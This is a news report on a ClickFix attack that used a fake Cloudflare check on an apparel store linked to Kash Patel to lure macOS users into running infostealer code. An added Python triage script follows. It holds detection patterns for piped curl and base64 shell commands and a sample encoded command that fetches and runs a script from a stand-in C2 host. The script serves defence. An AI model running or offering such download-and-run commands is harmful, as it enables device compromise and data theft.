FBI Chief Kash Patel’s Clothing Store Hacked in ClickFix Infostealer Attack
FBI Chief Kash Patel's clothing store hacked via ClickFix malware targeting macOS users.
Summary
Hackers compromised Based Apparel, an online clothing store linked to FBI Director Kash Patel, to distribute infostealer malware to macOS visitors. The attack used a ClickFix technique with a fake Cloudflare verification page that tricked users into running malicious code via Terminal, designed to steal cryptocurrency and browser data. The website was taken offline by Friday after the attack was discovered.
Full text
Hackers compromised FBI Chief Kash Patel’s clothing store in a ClickFix attack that tricked macOS users into installing infostealer malware.

By Deeba Ahmed, May 25, 2026

An online clothing shop linked to FBI Director Kash Patel went offline on Friday after it was found distributing an infostealer to visitors. The shop, called Based Apparel, was compromised by hackers to trick macOS users into downloading this type of malware, which steals private data.

How this ClickFix Attack Works

The unknown hackers involved in this campaign used a deceptive technique known as a ClickFix attack. When a user visited BasedApparel.com, the website displayed a fake warning page designed to look exactly like Cloudflare, a website security company that runs anti-bot “Verify you are human” checks.

The fake page told users that unusual web traffic was detected and asked them to complete a CAPTCHA test. To do this, the site gave highly unusual instructions and told visitors to open Terminal, which is a built-in utility on Mac computers used to execute system commands.

The website showed a button that said “Copy,” claiming it would copy a simple phrase like “I am not a robot.” Instead, clicking the button copied a long piece of obfuscated text. The website then instructed the user to paste this text into their Terminal. When it was pasted and run, the hidden code executed a shell script that connected to the hackers’ C2 domain. The malicious script was designed to drain crypto assets from digital wallets and steal sensitive session tokens and browser data.

[Image: ClickFix attack on the clothing store]

Discovery, Website Shutdown, and Coming Back Soon Message

A web user based in Portugal first spotted the attack on Thursday. Later, researchers managed to replicate the attack while navigating the store on a MacBook using the Chrome browser. However, by Friday, BasedApparel.com was completely down, displaying a message stating the store would be back online shortly.

[Video: demo of the ClickFix attack on the compromised site. Video credit: Debbie (@dm4uz3 on X)]

It remains unclear whether any visitors lost data due to the cyberattack, a concern given how much traffic the store attracts. Internet traffic data from the research firm Ahrefs reveals that the store, co-created by Kash Patel and Andrew Ollis before Patel became the head of the FBI, gets about 33,600 visits every month.

At the time of writing, the website was online, only displaying a one-page message stating “We’ll Be Right Back. We’re making improvements to better serve you. The store will be back online shortly – bolder than ever. Back Soon, Stay Based.”

[Image: Current status of the website. Image credit: Hackread.com]

This is also not the first time Kash Patel has appeared in cybersecurity-related headlines. Last month, the Iran-linked Handala hacker group breached Patel’s personal Gmail account and leaked private photos and documents.

Nevertheless, if you visited the malicious website, you should scan your browser and device for infostealer malware.
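For readers triaging a Mac after a ClickFix lure like the one described above, the following added example (not from the article or from the researchers) scores shell-history entries for the traits the article describes: an encoded blob pasted into Terminal that unpacks into a script contacting a remote host. The rule set, the sample history and the `c2.example.invalid` host are constructed assumptions, since the article does not publish the actual command.

```python
import base64
import re

# Assumed traits of a ClickFix-style pasted command (the article gives no sample).
SHELL = r"(?:sh|bash|zsh)\b"
RULES = {
    "decode_to_shell": re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*" + SHELL),
    "download_to_shell": re.compile(r"\b(?:curl|wget)\b.*\|\s*" + SHELL),
}
BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")  # long base64-looking token
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

def decode_blobs(cmd):
    """Return readable text hidden in base64-looking tokens of cmd."""
    out = []
    for tok in BLOB.findall(cmd):
        try:
            out.append(base64.b64decode(tok, validate=True).decode("utf-8"))
        except ValueError:  # not valid base64, or not text once decoded
            continue
    return out

def score_command(cmd):
    """Return (sorted indicator names, hosts contacted) for one shell command."""
    layers = [cmd] + decode_blobs(cmd)  # the command plus one decoded layer
    hits = {name for name, rx in RULES.items() if any(rx.search(l) for l in layers)}
    hits |= {"encoded_payload"} if len(layers) > 1 else set()
    hosts = sorted({h.lower() for l in layers for h in HOST.findall(l)})
    return sorted(hits), hosts

def triage(history_lines):
    """Flag history entries that match at least one indicator."""
    flagged = []
    for line in history_lines:
        # Drop the zsh EXTENDED_HISTORY prefix (": <epoch>:<duration>;") if present.
        cmd = re.sub(r"^: \d+:\d+;", "", line.strip())
        hits, hosts = score_command(cmd)
        if hits:
            flagged.append({"command": cmd[:60], "indicators": hits, "hosts": hosts})
    return flagged

# Constructed sample history, not taken from the incident; .invalid never resolves.
_PAYLOAD = base64.b64encode(b"curl -fsSL https://c2.example.invalid/stage.sh | sh").decode()
SAMPLE_HISTORY = [
    ": 1716500000:0;brew update",
    ": 1716500100:0;curl -fsSL https://example.com/README.md -o README.md",
    f": 1716500200:0;echo '{_PAYLOAD}' | base64 -d | zsh",
]

if __name__ == "__main__":
    print(triage(SAMPLE_HISTORY))
```

A hit is a lead for investigation rather than proof of infection, and a clean history does not rule out compromise, because a pasted command is not always recorded.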
Indicators of Compromise
- domain — BasedApparel.com
- malware — ClickFix infostealer